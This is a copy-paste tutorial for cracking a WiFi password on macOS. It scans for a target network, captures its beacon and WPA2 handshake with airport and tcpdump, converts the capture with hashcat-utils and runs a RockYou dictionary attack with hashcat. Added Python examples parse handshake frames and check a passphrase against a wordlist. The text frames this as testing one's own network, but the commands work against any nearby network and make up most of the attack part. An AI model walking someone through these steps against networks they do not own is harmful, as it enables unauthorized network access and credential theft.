Here we will walk you through every step of the attack, explaining some of the technologies as we go. Make sure you have completed the necessary installations page before you do this!
IMPORTANT: Any time one of the steps on this page prompts you to enter a password, enter the password used to unlock your computer, and then hit enter (your password will not appear in the terminal as you type so do not worry about that).
All steps should execute instantly unless noted otherwise.
Additionally, make sure that you go through these instructions in order, as commands usually depend on the output of previous commands.
Open Terminal.
First, we are going to download a wordlist that we will use later on. The wordlist, called RockYou.txt, is a list of 1.4 million common passwords. We will use this list to try to crack the password hash later in the attack. To download and unzip the file, copy and paste this command into Terminal (note: after every command that you copy and paste, be sure to hit enter so that it runs):
wget https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz?raw=true -O rockyou.txt.gz && gunzip rockyou.txt.gz
The output should look similar to this, but not necessarily identical as your environment may look different than ours. It is important to look for a "100%" somewhere in the terminal.
Execution Time: Less than one minute
Our goal is now to learn the name of the network router. We will do this using a tool called airport, which lets us determine both the network name and the MAC address.
MAC address (Media Access Control address): a unique identifier used to identify devices on a network.
In Terminal, copy and paste this command so that the airport binary can be found on your PATH (note: Apple removed the airport binary in macOS Sonoma 14.4, so this step and the airport commands that follow only work on earlier macOS releases):
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
If prompted, enter your password and hit enter.
Determine the name of the WiFi network that you are trying to attack. A list of WiFi names can be found by clicking on the WiFi button in the upper right-hand corner of your home screen. For our example, we will be attacking the “MySpectrumWifi4B-5G” network.
Now we will use the Mac's network listening abilities to get some more information about our target network. In Terminal, copy and paste this command:
sudo airport -s
The output should look something like the figure above. If no networks were found, repeat the previous step.
Execution Time: Instant
We now need to find the actual name of the network router. The name of the network router is what we need to impersonate the router. All login attempts need to be handled by the router, so when a new person logs into the WiFi their request will be sent to that name. We then want to intercept the encrypted login request that the user sends; this will likely be an encrypted password.
From the output of the previous step, find the BSSID of the target network. It should look like the BSSID outlined in red in the screenshot below:
This BSSID is the MAC address (the unique identifier) of the WiFi router. We are going to save the BSSID in an environment variable that we will use later. To do this, copy and paste this command:
export BSSID=<TARGET_MAC_ADDRESS>
In our example, we would run:
export BSSID=78:29:ed:27:07:4a
Verification
If the above command worked, you should be able to now run:
echo $BSSID
And see something like the below:
Execution Time: Instant
This step will only work if someone is trying to connect to the network. Either one needs to wait for someone else to make a login attempt on the network, or one could simulate a login attempt by disconnecting and reconnecting their phone to the network.
Now we are going to use airport to disassociate from all networks. This will disconnect you from WiFi, so make sure not to close this guide before you are done or you will not be able to access it. To disassociate, run:
sudo airport -z
Next, we will use airport to tell our machine to listen on the channel that our target network is using. First identify the channel from the output of the first step of the previous section, Set Environment Variables:
Execution Time: Instant
Now that we have identified our target network, we will use airport to start eavesdropping on that network. To do this, run:
sudo airport -c<target_channel>
In our example, we would run:
sudo airport -c36
Now we will begin collecting packets. To do this we are going to use tcpdump, a network packet analyzer. We are going to listen for a packet, and then save that packet to a file called beacon.cap. Run:
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en0 -w beacon.cap
This command should complete fairly quickly, as long as there are people using the target network [4]. Look for the packet captured line:
Execution Time: Less than one minute if people are actively using the network.
Once the last command is complete, we are going to start listening for any authentication packets. These packets get sent whenever someone re-authenticates to a network. (This happens any time someone goes from being not connected to the WiFi to being connected.) To listen for these packets, run:
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap
This will not complete immediately, so wait and move on to the next step. When the above command does terminate, it will save the authentication packets in a file called handshake.cap. Within this file will be the hash of the WiFi password that we will try to crack [7].
Execution Time: See Step 7
In order to make the last command terminate, we need to figure out a way to get someone to connect to the network. This is where it gets fun. In a real attack scenario, the attacker would just wait until someone entered the house. When doing this on your own home network, you can think of creative scenarios to convince your friends to disconnect and then reconnect to the WiFi. Or, if you want to be boring and you have a device that is connected to the target network, you can just turn the WiFi off on the device, then turn it back on, and wait for the device to reconnect to the target network. When the terminal output changes from Got 0 to a number greater than zero, such as Got 4 in the screenshot below, sufficient packets have been captured.
Once the terminal says that packets have been captured, you can kill the process by going to your terminal and pressing the control key (often abbreviated "Ctrl") and the "C" key at the same time.
Note: At this point you are free to reconnect to WiFi.
Execution Time: This command will not terminate until someone successfully authenticates to the target network.
Now we have to merge the two capture files into one file called capture.cap. To do that run:
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
We must convert capture.cap into a format that our cracking tool, hashcat, can use to crack the password hash. To do this, we have to install one last tool. We will download, compile, and run the tool using this command:
git clone https://github.com/hashcat/hashcat-utils.git && cd hashcat-utils/src && make && cd ../../ && hashcat-utils/src/cap2hccapx.bin capture.cap capture.hccapx
There will be a lot of text printed to the terminal, but the last few lines should look like this:
Note that if you already had a hashcat-utils folder in the working directory, this step may not work. In that case, run the previous command starting from the "cd hashcat-utils..." section.
Execution Time: Less than two minutes.
Make sure that there was at least one WPA Handshake written to capture.hccapx, as shown in the screenshot above. If there was not, then go back to the sudo tcpdump step of Start Listening and try again. If this still does not work, work back up the tutorial and confirm that you can successfully complete, and confirm the outputs of, Wait for Reconnection and Collect Packets. If the problem persists, it may be that your WiFi authentication scheme is not vulnerable to this attack.
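To see what cap2hccapx is looking for, here is an added example (not part of the original tutorial) that reads handshake.cap directly: it walks the pcap records, strips the radiotap header that tcpdump -I writes (link type 127), finds EAPOL-Key frames (EtherType 0x888e) and classifies each as message 1 to 4 of the WPA2 four-way handshake from its Key Information flags. The sample capture is constructed inline using the example BSSID from this page; the parser assumes link type 127 and unfragmented frames.

```python
import struct

LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP header for EtherType 0x888e
INSTALL, ACK, MIC, SECURE = 0x40, 0x80, 0x100, 0x200    # EAPOL-Key "Key Information" bits
AP, CLIENT = bytes.fromhex("7829ed27074a"), b"\x02" * 6  # constructed sample addresses

def eapol_message_number(key_info):
    """Map Key Information flags to WPA2 4-way handshake message 1..4 (None if unknown)."""
    ack, mic = bool(key_info & ACK), bool(key_info & MIC)
    if ack != mic:                      # exactly one of ACK/MIC set: M1 (ACK) or M2/M4 (MIC)
        return 1 if ack else (4 if key_info & SECURE else 2)
    return 3 if ack and key_info & INSTALL else None

def handshake_messages(pcap):
    """Return [(bssid, msg_no)] for every EAPOL-Key frame in a radiotap (link type 127) pcap."""
    endian = "<" if pcap[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    assert struct.unpack(endian + "I", pcap[20:24])[0] == 127, "need link type 127 (802.11 + radiotap)"
    found, off = [], 24                                    # 24-byte pcap global header
    while off + 16 <= len(pcap):                           # 16-byte per-packet record header
        incl_len = struct.unpack(endian + "I", pcap[off + 8:off + 12])[0]
        frame, off = pcap[off + 16:off + 16 + incl_len], off + 16 + incl_len
        dot11 = frame[struct.unpack("<H", frame[2:4])[0]:]  # skip radiotap (length at bytes 2-3)
        fc, flags = dot11[0], dot11[1]
        if fc & 0x0C != 0x08:                              # EAPOL travels in data frames only
            continue
        hdr = 24 + (2 if fc & 0x80 else 0) + (6 if flags & 0x03 == 0x03 else 0)  # QoS / 4-addr
        body = dot11[hdr:]
        if not body.startswith(LLC_SNAP_EAPOL) or body[9] != 3:  # EAPOL packet type 3 = Key
            continue
        key_info = struct.unpack(">H", body[13:15])[0]
        bssid = dot11[4:10] if flags & 0x01 else dot11[10:16] if flags & 0x02 else dot11[16:22]
        found.append((bssid.hex(":"), eapol_message_number(key_info)))
    return found

def messages_seen(pcap, bssid):
    """Handshake message numbers captured for one BSSID; a full capture gives {1, 2, 3, 4}."""
    return {n for b, n in handshake_messages(pcap) if b == bssid.lower() and n}

def _frame(to_ds, key_info):
    """Constructed 802.11 data frame carrying an EAPOL-Key message with the given flags."""
    addrs = AP + CLIENT + CLIENT if to_ds else CLIENT + AP + CLIENT
    dot11 = bytes([0x08, 0x01 if to_ds else 0x02]) + b"\x00\x00" + addrs + b"\x00\x00"
    eapol = b"\x02\x03" + struct.pack(">H", 3) + b"\x02" + struct.pack(">H", key_info)
    return b"\x00\x00\x08\x00\x00\x00\x00\x00" + dot11 + LLC_SNAP_EAPOL + eapol  # radiotap v0, len 8

def sample_pcap():
    """Constructed capture holding messages 1-4 of one handshake from the AP above."""
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 127)
    frames = [_frame(False, 0x008A), _frame(True, 0x010A), _frame(False, 0x13CA), _frame(True, 0x030A)]
    return hdr + b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)
```

Run it on your own file with `messages_seen(open("handshake.cap", "rb").read(), "<your BSSID>")`; if fewer than two messages show up for your BSSID, the capture is what failed, not the cracking step.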
Once we have the hash file, we are going to try to crack it using hashcat. A hash is just an encrypted password. We are going to go through the entire list of 1.4 million passwords that we downloaded earlier, encrypt each one, and then see if it matches the hash that we captured. If they match, then we have cracked the WiFi password [8]! To begin this process, run the command below (note: newer hashcat releases mark mode 2500 and the hccapx format as deprecated in favour of mode 22000; if your version rejects -m 2500, hashcat --help lists the current WPA modes):
hashcat -m 2500 capture.hccapx rockyou.txt
This process could take up to five minutes (remember, it is trying 1.4 Million passwords). If successful, the result will look like this:
Now all that is left to do is to retrieve the password! Finally, run:
hashcat -m 2500 capture.hccapx rockyou.txt --show
You should now have the cracked password, as shown in the screenshot above.
Execution Time: Five to ten minutes.
On my network, the password was rewardbarrel058 (don't worry, I changed it immediately after this example).
If the password attack was not successful, congratulations! You at least have a decently secure password. Keep in mind, however, that we only used 1.4 million passwords. A dedicated cracking rig could run through over a billion attempts in a very short amount of time.
You can also add your password to the wordlist and re-run the last few steps to see what it would look like if the steps did work. To do that, run echo <your_password> >> rockyou.txt where <your_password> is the password of your target network. This command appends your password to the end of the rockyou.txt file, thus adding it to the wordlist. For example, if rewardbarrel058 was not in rockyou.txt, we would add it by running:
echo rewardbarrel058 >> rockyou.txt
Now go back and follow the tutorial from Cracking The Hash, and the password hash should get cracked!
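The following is an added example (not part of the original tutorial) that turns the Cracking The Hash and wordlist steps above into a self-check for your own network: it derives the WPA2 pairwise master key the way hashcat must for every guess (PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 rounds), reports whether your passphrase is in a wordlist and how many guesses it would cost, and mirrors the `echo ... >> rockyou.txt` step. The wordlist here is a constructed five-entry stand-in; pass the real rockyou.txt lines and a measured guess rate for your own audit, and the SSID "MySpectrumWifi4B-5G" and 1.4 million entries are taken from this page.

```python
import hashlib

# Constructed stand-in for rockyou.txt; the real file downloaded earlier has about 1.4 million lines.
SAMPLE_WORDLIST = ["123456", "password", "iloveyou", "rewardbarrel058", "qwerty123"]
ROCKYOU_SIZE = 1_400_000        # size of the wordlist as stated in this tutorial

def wpa2_pmk(ssid, passphrase):
    """What a cracker must recompute for every guess: PBKDF2-HMAC-SHA1(passphrase, salt=SSID,
    4096 rounds, 32 bytes). It is a one-way derivation; nothing in the capture 'decrypts' back."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def guesses_until_found(passphrase, wordlist):
    """1-based position of the passphrase in the list, i.e. the number of guesses a dictionary
    run needs before it hits; None when the passphrase is not in the list at all."""
    for position, word in enumerate(wordlist, 1):
        if word == passphrase:
            return position
    return None

def append_to_wordlist(passphrase, wordlist):
    """Same effect as `echo <your_password> >> rockyou.txt`: the passphrase becomes the last guess."""
    return wordlist if passphrase in wordlist else wordlist + [passphrase]

def audit_passphrase(ssid, passphrase, wordlist, guesses_per_second, list_size=None):
    """Exposure summary for one network: whether a dictionary run finds the passphrase, how many
    guesses it costs, and how long exhausting the whole list takes at the given guess rate.
    list_size lets you scale the timing to the full 1.4 million entries with only a sample loaded."""
    position = guesses_until_found(passphrase, wordlist)
    size = len(wordlist) if list_size is None else list_size
    return {
        "in_wordlist": position is not None,
        "guesses_needed": position,
        "seconds_to_find": None if position is None else position / guesses_per_second,
        "seconds_to_exhaust_list": size / guesses_per_second,
        "pmk_hex": wpa2_pmk(ssid, passphrase).hex(),   # the value a matching guess reproduces
    }
```

Measure your own guess rate by timing a few hundred wpa2_pmk calls; the 4096 PBKDF2 rounds are why the page's run takes minutes rather than seconds, and why a passphrase that is absent from every wordlist is the thing that actually protects the network.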